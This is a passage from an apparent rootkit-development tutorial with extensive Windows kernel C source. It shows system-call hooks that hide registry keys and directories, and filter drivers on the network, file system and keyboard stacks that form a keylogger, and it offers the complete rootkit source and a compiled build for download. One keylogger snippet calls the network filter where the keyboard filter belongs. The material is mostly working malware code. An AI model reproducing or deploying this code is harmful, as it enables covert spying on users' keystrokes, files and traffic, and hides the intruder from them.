                                status = ZwEnumerateKey( //The ZwEnumerateKey routine returns information about a subkey of an open registry key

                                                                hKey, //Handle to the registry key that contains the subkeys to be enumerated

                index,  //The index of the subkey that you want information for. If the key has n subkeys, the subkeys are numbered from 0 to n-1

                KeyBasicInformation, //Specifies a KEY_INFORMATION_CLASS enumeration value that determines the type of information to be received

                pInfoStruct,  //Pointer to a caller-allocated buffer that receives the requested information

                infoStructSize, // size of buffer

                &resultLength); //Pointer to a variable that receives the size, in bytes, of the registry-key information

 

                                if( status == STATUS_SUCCESS )

                                {

                                                // Add one compare for each hidden key defined

                                                if( !wcsncmp( //wcsncmp compares at most the given number of wide characters and returns 0 when they match

                                                                                                ((KEY_BASIC_INFORMATION*)pInfoStruct)->Name,

                                                                                                g_key1,

                                                                                                SERVICE_KEY1_LENGTH) ||

                                                                !wcsncmp(

                                                                                                ((KEY_BASIC_INFORMATION*)pInfoStruct)->Name,

                                                                                                g_key2,

                                                                                                SERVICE_KEY2_LENGTH) ||

                                                                !wcsncmp(

                                                                                                ((KEY_BASIC_INFORMATION*)pInfoStruct)->Name,

                                                                                                g_key3,

                                                                                                SERVICE_KEY3_LENGTH) )

                                                                { //if it is one of our desired subkeys then ++ offset

                                                                                offset++;

                                                                }

                                                else

                                                                {

                                                                                visibleSubkeys++;

                                                                }

                                                AddIndices( pKeyHandle, index, (index + offset));

                                                index++;

                                }

                                else

                                {

                                                // STATUS_NO_MORE_ENTRIES

                                                break;

                                }

                }

                if( offset > 1 )

                {

                                // required if more than one sub key was found

                                AdjustIndices( pKeyHandle, offset );

                }

 

                ExFreePool( (PVOID)pInfoStruct );

               

                /* update data about this handle */

                if( pKeyHandle )

                {

                                REG_KEY_DATA* pKeyData = ((REG_KEY_DATA*)( pKeyHandle->keyData ));

                                if( pKeyData )

                                {

                                                pKeyData->subkeys = visibleSubkeys; //This line is important, since the effect of this line makes GetSubkeyCount in NewZwQueryKey does not reflect the hidden keys in the size

                                }

                                AddNewKeyHandle( pKeyHandle );

                }             

                return 0;

}

 

FindKeyHandle and FreeKeyHandle discard any index data previously built for this handle, because the key may have changed since the last call. AllocateKeyHandle returns a dynamically allocated KEY_HANDLE buffer. AddIndices records the new index for a subkey, and AddNewKeyHandle adds the key, with its subkeys, to the tree. The challenging function is AdjustIndices. If more than one subkey is hidden, the new indexes have to be adjusted after all subkeys have been added, because at that point the data structure for the example from the beginning of the article looks like Figure 1:

[Figure 1: Rootkit concealment registry hiding]

As you can see, we want to hide keys 6 and 10, but 10 is still returned for key 9. To adjust the indexes we use the code below:

// reindex key pair list when more than one

// sub key is hidden under a single key

void AdjustIndices( KEY_HANDLE* pKeyHandle, int hiddenKeys )

{

                KeAcquireSpinLock(&g_registrySpinLock, &g_pCurrentIRQL);

 

                if(            pKeyHandle->keyData )

                {

                                REG_KEY_DATA* pKeyData = ((REG_KEY_DATA*)( pKeyHandle->keyData ));

                                if( pKeyData )

                                {

                                                int offset = 0;

                                                SUBKEY_DATA* pSubkeyData = pKeyData->subkeyData;

                                               

                                                // loop through indices looking for hidden keys

                                                while( pSubkeyData->next != NULL )

                                                {

                                                                if( pSubkeyData->subkeyIndex + offset != pSubkeyData->newIndex ) //goes forward till finding the first hidden key, after finding it adjusts the keys before the next hidden the key to the end

                                                                {

                                                                                hiddenKeys--;

                                                                                // adjust next hidden key

                                                                                offset++;

                                                                                pSubkeyData = AdjustNextNewIndex( pSubkeyData, offset ); //This function adjusts new indexes if there is a hidden key after this hidden key.

                                                                                offset = pSubkeyData->newIndex - pSubkeyData->subkeyIndex;

                                                                }

                                                                pSubkeyData = pSubkeyData->next;

                                                                // no need to exceed show count

                                                                if( !hiddenKeys )

                                                                                break;

                                                }

                                }

                }

                KeReleaseSpinLock( &g_registrySpinLock, g_pCurrentIRQL );

}

// increment next newIndex

SUBKEY_DATA* AdjustNextNewIndex( SUBKEY_DATA* pSubkeyData, int offset )

{

                SUBKEY_DATA* targetKey = NULL;;

 

                while( pSubkeyData->next != NULL )

                {

                                if( pSubkeyData->next->subkeyIndex + offset != pSubkeyData->next->newIndex ) //goes forward till finding the next hidden key since the offset passed to this function incremented

                                {

                                                // next key is a hidden key

                                                // so increment newIndex

                                                if( targetKey == NULL )

                                                {

                                                                targetKey = pSubkeyData;//targetKey points to the element before the next hidden key if it is null

                                                }

                                                else

                                                {

                                                                // adjust all new indices

                                                                // until next non hidden key

                                                                SUBKEY_DATA* tempKey = targetKey;

                                                                while( tempKey != pSubkeyData) //This while executes for two adjacent hidden keys

                                                                {

                                                                                tempKey->next->newIndex++;

                                                                                tempKey = tempKey->next;

                                                                }

                                                }

                                                targetKey->newIndex++;

                                                offset++;

                                }

                                else

                                {

                                                // keep incrementing newIndex

                                                // until next key is not hidden

                                                if( targetKey )

                                                                break;

                                }

                                pSubkeyData = pSubkeyData->next;

                }

                // list is now good up to target key

                return targetKey;

}

 

After AdjustIndices has run, the subkey indexes look like Figure 2:

[Figure 2: Rootkit concealment registry hiding]

To clarify the concept, let’s walk through the result of AdjustIndices for the earlier example, going from index 1 to 12:

For 1 the system returns the first key.

For 2 the system returns the second key.

For 6 the system returns the 7th key. Here we hide the actual 6th key by skipping it and returning the next one.

For 7 we return the 8th key (this is correct, since the key after the 7th, which we already returned, is the 8th).

For 9 we can’t return the 10th key because it is also hidden, so we return the key after it, the 11th.

For 10 we return the 12th key. (Any key hides the 10th as long as it is not the 10th itself!)

Remember that ZwQueryKey is hooked as well and NewZwQueryKey reports 10 subkeys, so callers of NewZwEnumerateKey stop at index 10; there is no need to worry about entries 11 and 12 in our index table.
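The lookup side of the index table can be modelled in user mode as a walk over a linked list of index pairs. This is only a sketch: the article does not show the body of GetNewIndex, so the struct index_pair type and the lookup_new_index function below are assumptions made for illustration, loosely mirroring the SUBKEY_DATA fields. The one behaviour taken from the article is that -1 means no remapping is known.

```c
#include <stddef.h>

/* User-mode stand-in for the article's SUBKEY_DATA list node
 * (hypothetical type, for illustration only). */
struct index_pair {
    unsigned long subkey_index;  /* index the caller asks for */
    unsigned long new_index;     /* index that is actually forwarded */
    struct index_pair *next;     /* next pair, or NULL at the end */
};

/* Hypothetical lookup: returns the remapped index for a requested
 * index, or -1 when the list has no entry for it. */
long lookup_new_index(const struct index_pair *head, unsigned long index)
{
    for (const struct index_pair *p = head; p != NULL; p = p->next) {
        if (p->subkey_index == index)
            return (long)p->new_index;
    }
    return -1;
}
```

For a list holding the pairs (6, 7), (9, 11) and (10, 12) from the example, a request for 9 yields 11, and a request for an index that is not listed yields -1, in which case the caller would leave the requested index unchanged.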

After creating the new indexes we are ready to return them to the user (and the system) and hide the registry keys. We hook ZwEnumerateKey and ZwQueryKey and replace them with our own code:

// return number of subkeys from special index

// when the parent key is \\Services

NTSTATUS NewZwQueryKey( IN HANDLE KeyHandle, //This hook reports the number of subkeys of the parent key minus the hidden keys, so the system never asks for an index beyond the end of our crafted list

                IN KEY_INFORMATION_CLASS KeyInformationClass,

                OUT PVOID KeyInformation,

                IN ULONG Length,

                OUT PULONG ResultLength )

{

    int status;

                ULONG numberOfSubkeys = -1;

 

    status = OldZwQueryKey(

                                KeyHandle,

                                KeyInformationClass,

                                KeyInformation,

                                Length,

                                ResultLength );

   

                numberOfSubkeys = GetSubkeyCount( KeyHandle ); //Return the real size - number of hidden keys

               

                if(            (status == STATUS_SUCCESS) && (numberOfSubkeys != -1) )

                                if( KeyFullInformation == KeyInformationClass )

                                                if( KeyInformation )

                                                                ((KEY_FULL_INFORMATION*)KeyInformation)->SubKeys = numberOfSubkeys;

 

                return status;

}

 

// return special index values

// when the parent key is \\Services

NTSTATUS NewZwEnumerateKey( IN HANDLE KeyHandle, //In this hooked function we manipulate the request of the caller. We never ask the system for the indexes of hidden keys

                IN ULONG Index,

                IN KEY_INFORMATION_CLASS KeyInformationClass,

                OUT PVOID KeyInformation,

                IN ULONG Length,

                OUT PULONG ResultLength )

{

    int status;

                int new_index;

 

                new_index = GetNewIndex( KeyHandle, Index ); //In new indexes we never return the index of hidden keys

 

                if( new_index != -1 )

                                Index = new_index;

 

    status = OldZwEnumerateKey( //The result therefore only ever describes visible keys; because ZwQueryKey is also hooked, callers do not ask for more subkeys than we report

                                KeyHandle,

                                Index,

                                KeyInformationClass,

                                KeyInformation,

                                Length,

                                ResultLength );

 

    return status;

}

 

To see the complete rootkit source code, download the sources and the compiled version (for XP SP3 gold edition) for both this and the next rootkit concealment article. To test the registry hiding functionality after compiling, open the registry editor and add the keys SSSDriver1 and SSSDriver2 under the Services key. Close the registry editor, load and run the rootkit, then open the registry editor again to see the effect.

Directory hiding c++ source code

Directory hiding is much simpler than registry hiding. The only thing we need to do is hook ZwQueryDirectoryFile and return the directory listing of the parent directory without any trace of our hidden directory:

NTSTATUS NewZwQueryDirectoryFile(

                IN HANDLE hFile,

                IN HANDLE hEvent OPTIONAL,

                IN PIO_APC_ROUTINE IoApcRoutine OPTIONAL,

                IN PVOID IoApcContext OPTIONAL,

                OUT PIO_STATUS_BLOCK pIoStatusBlock,

                OUT PVOID FileInformationBuffer,

                IN ULONG FileInformationBufferLength,

                IN FILE_INFORMATION_CLASS FileInfoClass,

                IN BOOLEAN bReturnOnlyOneEntry,

                IN PUNICODE_STRING PathMask OPTIONAL,

                IN BOOLEAN bRestartQuery

)

{

                NTSTATUS status;

 

                status = OldZwQueryDirectoryFile(

                                                hFile,

                                                hEvent,

                                                IoApcRoutine,

                                                IoApcContext,

                                                pIoStatusBlock,

                                                FileInformationBuffer,

                                                FileInformationBufferLength,

                                                FileInfoClass,

                                                bReturnOnlyOneEntry,

                                                PathMask,

                                                bRestartQuery);

 

                if( NT_SUCCESS( status ) && (FileInfoClass == 3) ) //Because ZwQueryDirectoryFile  is used for other purposes than querying directory

                {                             

                                BOOL isLastDirectory;

                                DirEntry* pLastDirectory = NULL;

                                DirEntry* pThisDirectory = (DirEntry*)FileInformationBuffer;

                                // for each directory entry in the list

                                do

                                {

                                                isLastDirectory = !( pThisDirectory->dwLenToNext );

                                               

                                                // compare with g_hiddenDirectoryName

                                                if( RtlCompareMemory( (PVOID)&pThisDirectory->suName[ 0 ], //Compares two blocks of memory starting from the first and second parameter, returns the number of bytes that match. In case it is the HIDDEN_DIR_NAME_LENGTH, it means two strings are equal.

                                                                (PVOID)&g_hiddenDirectoryName[ 0 ],

                                                                HIDDEN_DIR_NAME_LENGTH ) == HIDDEN_DIR_NAME_LENGTH )

                                                {

                                                                if( isLastDirectory )

                                                                {

                                                                                // return STATUS_NO_MORE_FILES if the hidden

                                                                                // directory is the only directory in the list

                                                                                // else set the previous directory to end-of-list

                                                                                // if hidden directory is at the end of the list

                                                                                if( pThisDirectory == (DirEntry*)FileInformationBuffer )

                                                                                                status = 0x80000006;

                                                                                else

                                                                                                pLastDirectory->dwLenToNext = 0; //dwLenToNext shows the length of its element except the last element. It does not cause any harms in finding the next directory since we will use the dwLenToNext in lines 396 and 397 when it has a value and after that in the next iteration the value will become zero

                                                                                break;

                                                                }

                                                                else

                                                                {

                                                                                // copy remainder of directory list into this location

                                                                                // to eliminate this directory entry from the list

                                                                                int offset = ((ULONG)pThisDirectory) - (ULONG)FileInformationBuffer; //Offset to the found entry (the directory we want to hide)

                                                                                int size = (DWORD)FileInformationBufferLength - offset - pThisDirectory->dwLenToNext; // Subtracting the offset of the directory entry and the length of the entry gives the number of bytes that remain after it

                                                                                RtlCopyMemory( (PVOID)pThisDirectory, //We copy bytes after the directory (to the end), to the place of directory so removing the directory data

                                                                                                (PVOID)((char*)pThisDirectory + pThisDirectory->dwLenToNext ),

                                                                                                (DWORD)size );

                                                                                continue;

                                                                }

                                                }

                                                pLastDirectory = pThisDirectory;

                                                pThisDirectory = (DirEntry*)((char *)pThisDirectory + pThisDirectory->dwLenToNext );

                                } while( !isLastDirectory );

                }

 

                return( status );

}

 

Directory hiding handles three cases. First, if the FileInformationBuffer returned by the original ZwQueryDirectoryFile contains only our directory, we return status = 0x80000006 (STATUS_NO_MORE_FILES), which tells the caller that there are no entries. Second, if the buffer contains other entries as well and our hidden directory is the last one, we drop it by setting the previous entry's dwLenToNext to zero. Third, if the hidden directory is not the last entry, we remove it by copying the entries that follow it over it.

Published in Rootkit development
Monday, 01 June 2015 00:00

Keylogger Source Code

Spyware is a type of malware that aims to record every move you make: your network traffic, your files and whatever you type on the keyboard. Spyware source code consists mostly of driver code. The rootkit registers itself as a network, file system and keyboard filter driver; after that, I/O requests to write to a disk, read from the network or read a key flow through the rootkit, where the data can be recorded. Figure 1 shows the concept. Although recording these resources may seem similar, the technical details of the keylogger source code differ from those of other rootkit source code such as the file system spyware. Of the three, intercepting network traffic is the easiest, so we start with the network spyware source code, then add the details needed to monitor the file system, and finally write the keylogger.

Figure 1 (rootkit spyware design)

Network spyware source code

Intercepting network traffic is possible by placing a filter on top of the network driver stack. In simple words, a filter is code that runs before the real device driver is called. For example, if a user pings a host, the filter sees the request first and then passes it on to the driver. Filtering is a capability that Windows provides (for other purposes, of course) and we take advantage of it. To add a filter we attach our device to the chain of devices; from then on ours is the first one in the chain to be called. This is done with IoAttachDevice:

// spyware source code
// rootkit source code
NTSTATUS DriverEntry( IN PDRIVER_OBJECT pDriverObject, IN PUNICODE_STRING theRegistryPath )

{

                int loop;

                DRIVER_DATA* driverData;

    UNICODE_STRING deviceName = { 0 };

    UNICODE_STRING deviceLink = { 0 };

                PDEVICE_OBJECT pDeviceController;

                PWSTR SymbolicLinkList;

 

                // Create the device controller

                RtlInitUnicodeString( &deviceName, GHOST_DEVICE_CREATE_NAME );

                IoCreateDevice( pDriverObject,

                                 0,

                                 &deviceName,

                                 FILE_DEVICE_UNKNOWN,

                                 0,

                                 FALSE,

                                 &pDeviceController );

    RtlInitUnicodeString( &deviceLink, GHOST_DEVICE_LINK_NAME );

    IoCreateSymbolicLink( &deviceLink, &deviceName );

 

                // Route standard I/O through our dispatch routine

                for(loop = 0; loop < IRP_MJ_MAXIMUM_FUNCTION; loop++)

                                pDriverObject->MajorFunction[loop] = OnDispatch;

 

 

                if( !NT_SUCCESS( insertNetworkFilter( pDriverObject,

                                &oldNetworkDevice,

                                &newNetworkDevice,

                                L"\\Device\\Tcp") ) )

                                DbgPrint("comint32: Could not insert network filter");

 

 

                return STATUS_SUCCESS;

}

NTSTATUS insertNetworkFilter(PDRIVER_OBJECT pDriverObject,

                PDEVICE_OBJECT* ppOldDevice,

                PDEVICE_OBJECT* ppNewDevice,

                wchar_t* deviceName)

{

                NTSTATUS status = STATUS_SUCCESS;

                UNICODE_STRING unicodeName = { 0 };

 

                // Create a new device

                status = IoCreateDevice( pDriverObject,

                                0,

                                NULL,

                                FILE_DEVICE_UNKNOWN,

                                0,

                                TRUE,

                                ppNewDevice );

 

                if( !NT_SUCCESS( status ) )

                                return status;

 

                // Initialize the new device

                ((PDEVICE_OBJECT)(*ppNewDevice))->Flags |= DO_DIRECT_IO;

 

                // Attach the new device

                RtlInitUnicodeString( &unicodeName, deviceName );

                status = IoAttachDevice( *ppNewDevice,

                                &unicodeName,

                                ppOldDevice );

 

                // Prevent unload if load failed

                if( !NT_SUCCESS( status ) )

                {

                                IoDeleteDevice( *ppNewDevice );

                                *ppNewDevice = NULL;

                }

 

                return status;

}

 

 

File system spyware source code

To add the driver to the chain of file system drivers we use IoAttachDeviceToDeviceStack. It differs from IoAttachDevice in that it takes a device object rather than a device name, so we first have to find the device object at the top of the file system's stack and then attach our device to it:

// rootkit source code
// spyware source code
NTSTATUS DriverEntry( IN PDRIVER_OBJECT pDriverObject, IN PUNICODE_STRING theRegistryPath )

{

….

                if( !NT_SUCCESS( insertFileFilter( pDriverObject,

                                &oldFileSysDevice,

                                &newFileSysDevice,

                                L"\\DosDevices\\C:\\") ) )

                                DbgPrint("comint32: Could not insert file system filter");

….

}

NTSTATUS insertFileFilter(PDRIVER_OBJECT pDriverObject,

                PDEVICE_OBJECT* ppOldDevice,

                PDEVICE_OBJECT* ppNewDevice,

                wchar_t* deviceName)

{

                NTSTATUS                                           status;

                UNICODE_STRING                           unicodeDeviceName;

                HANDLE                                                               fileHandle;

                IO_STATUS_BLOCK                         statusBlock = { 0 };

                OBJECT_ATTRIBUTES      objectAttributes = { 0 };

                PFILE_OBJECT                    fileObject;

 

                // Get the device for the specified drive

                RtlInitUnicodeString( &unicodeDeviceName, deviceName );

                InitializeObjectAttributes( &objectAttributes,

                                &unicodeDeviceName,

                                OBJ_CASE_INSENSITIVE,

                                NULL,

                                NULL );

 

                status = ZwCreateFile( &fileHandle,

                                SYNCHRONIZE|FILE_ANY_ACCESS,

                                &objectAttributes,

                                &statusBlock,

                                NULL,

                                0,

                                FILE_SHARE_READ | FILE_SHARE_WRITE,

                                FILE_OPEN,

                                FILE_SYNCHRONOUS_IO_NONALERT | FILE_DIRECTORY_FILE,

                                NULL,

                                0 );

 

                if( !NT_SUCCESS( status ) )

                                return status;

 

                status = ObReferenceObjectByHandle( fileHandle,

                                FILE_READ_DATA,

                                NULL,

                                KernelMode,

                                (PVOID *)&fileObject,

                                NULL );

 

                if( !NT_SUCCESS( status ) )

                {

                                ZwClose( fileHandle );

                                return status;

                }

 

                *ppOldDevice = IoGetRelatedDeviceObject( fileObject );

 

                if( !*ppOldDevice )

                {

                                ObDereferenceObject( fileObject );

                                ZwClose( fileHandle );

                                return STATUS_ABANDONED;

                }

 

                // Create a new device

    status = IoCreateDevice( pDriverObject,

         0,

         NULL,

         (*ppOldDevice)->DeviceType,

         0,

         FALSE,

         ppNewDevice );

 

    if( !NT_SUCCESS( status ) )

                {

                                ObDereferenceObject( fileObject );

                                ZwClose( fileHandle );

                                return status;

                }

 

                // Initialize the new device

    if( (*ppOldDevice)->Flags & DO_BUFFERED_IO )

                                (*ppNewDevice)->Flags |= DO_BUFFERED_IO;

    if( (*ppOldDevice)->Flags & DO_DIRECT_IO )

                                (*ppNewDevice)->Flags |= DO_DIRECT_IO;

    if( (*ppOldDevice)->Characteristics & FILE_DEVICE_SECURE_OPEN )

                                (*ppNewDevice)->Characteristics |= FILE_DEVICE_SECURE_OPEN;

 

                // Attach the new device to the old device

                *ppOldDevice = IoAttachDeviceToDeviceStack( *ppNewDevice, *ppOldDevice );

                if( *ppOldDevice == NULL )

                {

                                // Prevent unload if load failed

                                IoDeleteDevice( *ppNewDevice );

                                *ppNewDevice = NULL;

                                // Clean up and return error

                                ObDereferenceObject( fileObject );

                                ZwClose( fileHandle );

        return STATUS_NO_SUCH_DEVICE;

                }

 

                ObDereferenceObject( fileObject );

                ZwClose( fileHandle );

 

                return STATUS_SUCCESS;

}

 

 

File system monitoring has one more difference: some requests are answered from the cache through the fast I/O path, so to handle those requests we must add a fast I/O dispatch table:

// spyware source code
// rootkit source code
NTSTATUS DriverEntry( IN PDRIVER_OBJECT pDriverObject, IN PUNICODE_STRING theRegistryPath )

{

                PFAST_IO_DISPATCH pFastIoDispatch;

….

                pFastIoDispatch = (PFAST_IO_DISPATCH)ExAllocatePool( NonPagedPool, sizeof( FAST_IO_DISPATCH ) );

    if( !pFastIoDispatch )

                {

                    IoDeleteSymbolicLink( &deviceLink );

                                IoDeleteDevice( pDeviceController );

                                DbgPrint("comint32: Could not allocate FAST_IO_DISPATCH");                  

                                return STATUS_UNSUCCESSFUL;

                }

                RtlZeroMemory( pFastIoDispatch, sizeof( FAST_IO_DISPATCH ) );

                pFastIoDispatch->SizeOfFastIoDispatch = sizeof(FAST_IO_DISPATCH);

                pFastIoDispatch->FastIoDetachDevice = FastIoDetachDevice;

                pFastIoDispatch->FastIoCheckIfPossible = FastIoCheckIfPossible;

                pFastIoDispatch->FastIoRead = FastIoRead;

                pFastIoDispatch->FastIoWrite = FastIoWrite;

                pFastIoDispatch->FastIoQueryBasicInfo = FastIoQueryBasicInfo;

                pFastIoDispatch->FastIoQueryStandardInfo = FastIoQueryStandardInfo;

                pFastIoDispatch->FastIoLock = FastIoLock;

                pFastIoDispatch->FastIoUnlockSingle = FastIoUnlockSingle;

                pFastIoDispatch->FastIoUnlockAll = FastIoUnlockAll;

                pFastIoDispatch->FastIoUnlockAllByKey = FastIoUnlockAllByKey;

                pFastIoDispatch->FastIoDeviceControl = FastIoDeviceControl;

                pFastIoDispatch->FastIoQueryNetworkOpenInfo = FastIoQueryNetworkOpenInfo;

                pFastIoDispatch->MdlRead = FastIoMdlRead;

                pFastIoDispatch->MdlReadComplete = FastIoMdlReadComplete;

                pFastIoDispatch->PrepareMdlWrite = FastIoPrepareMdlWrite;

                pFastIoDispatch->MdlWriteComplete = FastIoMdlWriteComplete;

                pFastIoDispatch->FastIoReadCompressed = FastIoReadCompressed;

                pFastIoDispatch->FastIoWriteCompressed = FastIoWriteCompressed;

                pFastIoDispatch->MdlReadCompleteCompressed = FastIoMdlReadCompleteCompressed;

                pFastIoDispatch->MdlWriteCompleteCompressed = FastIoMdlWriteCompleteCompressed;

                pFastIoDispatch->FastIoQueryOpen = FastIoQueryOpen;

                pDriverObject->FastIoDispatch = pFastIoDispatch;

….

}
 

 

All of these functions (FastIoDetachDevice, FastIoCheckIfPossible, FastIoRead and so on) must be defined, but the logic behind them is the same: call a filter function to process the request, then call the original FastIoXXX function. An example definition:
// spyware source code
// rootkit source code
BOOLEAN FastIoCheckIfPossible( IN PFILE_OBJECT FileObject,

                IN PLARGE_INTEGER FileOffset,

                IN ULONG Length,

                IN BOOLEAN Wait,

                IN ULONG LockKey,

                IN BOOLEAN CheckForReadOperation,

                OUT PIO_STATUS_BLOCK IoStatus,

                IN PDEVICE_OBJECT DeviceObject )

{

                PFAST_IO_DISPATCH     fastIoDispatch;

 

                filterFastIo( FileObject, TRUE, FIO_CHECK_IF_POSSIBLE ); // the filter function, called on every fast I/O request

                fastIoDispatch = oldFileSysDevice->DriverObject->FastIoDispatch; // from here to the return: call the original routine of the old device and return its result

                if( VALID_FAST_IO_DISPATCH_HANDLER( fastIoDispatch, FastIoCheckIfPossible ) ) // macro that performs a series of checks to see that the old device's driver provides this routine

                {

                                return (fastIoDispatch->FastIoCheckIfPossible)( FileObject,

                                                FileOffset,

                                                Length,

                                                Wait,

                                                LockKey,

                                                CheckForReadOperation,

                                                IoStatus,

                                                oldFileSysDevice );

                }

                return FALSE;

}

void filterFastIo( PFILE_OBJECT file, BOOL cache, int function )

{

                // This would be a great place to filter fast file I/O

 

                UNREFERENCED_PARAMETER( file );

                UNREFERENCED_PARAMETER( cache );

                UNREFERENCED_PARAMETER( function );

                return;

 

}
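
The check-then-forward pattern used by the FastIoXXX wrappers can be illustrated in portable user-mode C. This is only a sketch under stated assumptions: dispatch_table, VALID_HANDLER, sample_lower_check and filtered_check_if_possible are hypothetical names invented for the illustration, and the macro only approximates the kind of checks that VALID_FAST_IO_DISPATCH_HANDLER is described as doing (table present, table large enough to contain the field, handler set).

```c
#include <assert.h>
#include <stddef.h>

/* Hypothetical handler type and table, standing in for FAST_IO_DISPATCH. */
typedef int (*check_fn)(int length);

typedef struct dispatch_table {
    size_t   size_of_table;      /* plays the role of SizeOfFastIoDispatch */
    check_fn check_if_possible;
    check_fn read;
} dispatch_table;

/* Assumed shape of the validity check: the table exists, it is large
   enough to contain the requested field, and the field is not NULL. */
#define VALID_HANDLER(table, field) \
    ((table) != NULL && \
     (table)->size_of_table >= offsetof(dispatch_table, field) + sizeof(check_fn) && \
     (table)->field != NULL)

static int observed_calls = 0;   /* what the "filter" step records here */

/* Hypothetical lower-level handler used only for the illustration. */
int sample_lower_check(int length)
{
    assert(length >= 0);
    return length > 0;
}

/* Wrapper: run the filter step first, then forward to the lower table
   if it provides the handler; otherwise report failure (0). */
int filtered_check_if_possible(const dispatch_table *lower, int length)
{
    observed_calls++;
    if (VALID_HANDLER(lower, check_if_possible))
        return lower->check_if_possible(length);
    return 0;
}
```

As in the driver code, the wrapper returns a failure value when the lower table is missing, too short, or has no handler, instead of calling through an invalid pointer.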

 

With the filters in place, the OnDispatch function can intercept the requests. In the OnDispatch function below we only print a debug statement to show that it works:

// spyware source code
// rootkit source code
NTSTATUS OnDispatch( PDEVICE_OBJECT DeviceObject, PIRP Irp )
{
	PIO_STACK_LOCATION	irpStack;
	PVOID			inputBuffer;
	PVOID			outputBuffer;
	ULONG			inputBufferLength;
	ULONG			outputBufferLength;
	ULONG			ioControlCode;
	NTSTATUS		status;

	// Get the IRP stack
	irpStack = IoGetCurrentIrpStackLocation (Irp);

	// Intercept I/O Request Packets to the TCP/IP driver
	if( DeviceObject == newNetworkDevice )
	{
		if( irpStack->MajorFunction == IRP_MJ_CREATE )
			DbgPrint("comint32: TCP/IP - CREATE");

		IoSkipCurrentIrpStackLocation ( Irp );
		return IoCallDriver( oldNetworkDevice, Irp );
	}
	// Intercept I/O Request Packets to drive C
	if( DeviceObject == newFileSysDevice )
	{
		if( irpStack->MajorFunction == IRP_MJ_QUERY_VOLUME_INFORMATION )
			DbgPrint("comint32: FILE SYSTEM - VOLUME QUERY");

		IoSkipCurrentIrpStackLocation ( Irp );
		return IoCallDriver( oldFileSysDevice, Irp );
	}
...
}

 

 

 

C++ keylogger source code

Keyloggers resemble network and file system spyware, but reading the keyboard buffer before it is sent to any other application cannot be done simply by placing a filter. The filter puts the rootkit on top of all other drivers, so it becomes the first driver to receive the I/O request, before the keyboard driver has processed it. Figure 2 shows the overall view of the system.

Figure 2 (Keylogger source code execution flow)

At first sight this means we would have to write a keyboard driver to process the I/O request, when all we need is the processed request and the key code. We avoid writing a driver from the ground up by inserting a filter driver on top of the driver stack and setting a completion routine, which is called after the lower driver finishes its work (this is an inherent capability: any higher-level driver can set a completion routine to be called after the lower driver's operation). Thus we let the original keyboard driver do its job and produce the key; afterwards our completion routine is called and has access to the key code. Calling the original keyboard driver and setting a completion routine is simple: to set our completion routine we create a new Irp. The new Irp copies the data of the old Irp, and we set its MajorFunction to IRP_MJ_READ (we arrive here from the IRP_MJ_READ case in the dispatch routine). Moreover, the original Irp is passed as the context of the completion routine, so the original request can still be handled once the new one completes.

The code below places the driver on top of the keyboard driver chain:

// keylogger source code
NTSTATUS DriverEntry( IN PDRIVER_OBJECT pDriverObject, IN PUNICODE_STRING theRegistryPath )
{
….
	if( !NT_SUCCESS( insertNetworkFilter( pDriverObject,
		&oldNetworkDevice,
		&newNetworkDevice,
		L"\\Device\\Tcp") ) )
		DbgPrint("comint32: Could not insert network filter");
….
}
NTSTATUS insertKeyboardFilter(PDRIVER_OBJECT pDriverObject,
	PDEVICE_OBJECT* ppOldDevice,
	PDEVICE_OBJECT* ppNewDevice,
	wchar_t* deviceName)
{
	NTSTATUS status = STATUS_SUCCESS;
	UNICODE_STRING unicodeName = { 0 };

	// Create a new device
	status = IoCreateDevice( pDriverObject,
		0,
		NULL,
		FILE_DEVICE_KEYBOARD,
		0,
		FALSE,
		ppNewDevice );

	if( !NT_SUCCESS( status ) )
		return status;

	// Initialize the new device
	((PDEVICE_OBJECT)(*ppNewDevice))->Flags |= (DO_BUFFERED_IO | DO_POWER_PAGABLE);
	((PDEVICE_OBJECT)(*ppNewDevice))->Flags &= ~DO_DEVICE_INITIALIZING;

	// Attach the new device
	RtlInitUnicodeString( &unicodeName, deviceName );
	status = IoAttachDevice( *ppNewDevice, //adding filter
		&unicodeName,
		ppOldDevice );

	// Prevent unload if load failed
	if( !NT_SUCCESS( status ) )
	{
		IoDeleteDevice( *ppNewDevice );
		*ppNewDevice = NULL;
	}
	else
	{
		// Prepare the keylogging thread
		StartKeylogger( pDriverObject ); // started here because file writes must happen at PASSIVE_LEVEL: the thread is created when DriverEntry inserts the filter and then waits to be signaled through a semaphore
	}

	return status;
}

 

 

Completion routine

To create the new Irp and set the completion routine we use the code below:

  

// keylogger source code
NTSTATUS OnDispatch( PDEVICE_OBJECT DeviceObject, PIRP Irp )
{
PIO_STACK_LOCATION irpStack;
PVOID inputBuffer;
PVOID outputBuffer;
ULONG inputBufferLength;
ULONG outputBufferLength;
ULONG ioControlCode;
NTSTATUS status;

// Get the IRP stack
irpStack = IoGetCurrentIrpStackLocation (Irp);

....

// Intercept I/O Request Packets to the keyboard
if( DeviceObject == newKeyboardDevice )
{
if( irpStack->MajorFunction == IRP_MJ_READ )
return OnKeyboardRead( DeviceObject, Irp, irpStack ); // reads from the keyboard are monitored by this function
// OnKeyboardRead creates a new Irp from the old one and sets an I/O completion routine on it. After that it calls the next driver with the new Irp
IoSkipCurrentIrpStackLocation ( Irp );
return IoCallDriver( oldKeyboardDevice, Irp );
}

....

}



NTSTATUS OnKeyboardRead( PDEVICE_OBJECT pDeviceObject,
 PIRP Irp,
 PIO_STACK_LOCATION irpStack )
{
 NTSTATUS status;
 PIRP newIrp;
 PIO_STACK_LOCATION newirpStack;

 // create new irp
 newIrp = IoAllocateIrp( pDeviceObject->StackSize, FALSE );
 IoSetNextIrpStackLocation( newIrp );
 newirpStack = IoGetCurrentIrpStackLocation( newIrp );
 newIrp->AssociatedIrp.SystemBuffer = Irp->AssociatedIrp.SystemBuffer;
 newIrp->RequestorMode = KernelMode; // Irp->RequestorMode;
 newIrp->Tail.Overlay.Thread = Irp->Tail.Overlay.Thread;
 newIrp->Tail.Overlay.OriginalFileObject = Irp->Tail.Overlay.OriginalFileObject;
 newIrp->Flags = Irp->Flags;
 newirpStack->MajorFunction = IRP_MJ_READ;
 newirpStack->MinorFunction = irpStack->MinorFunction;
 newirpStack->Parameters.Read = irpStack->Parameters.Read;
 newirpStack->DeviceObject = pDeviceObject;
 newirpStack->FileObject = irpStack->FileObject;
 newirpStack->Flags = irpStack->Flags;
 newirpStack->Control = 0;
 IoCopyCurrentIrpStackLocationToNext( newIrp ); // copies the IRP stack parameters from the current I/O stack location to the stack location of the next-lower driver
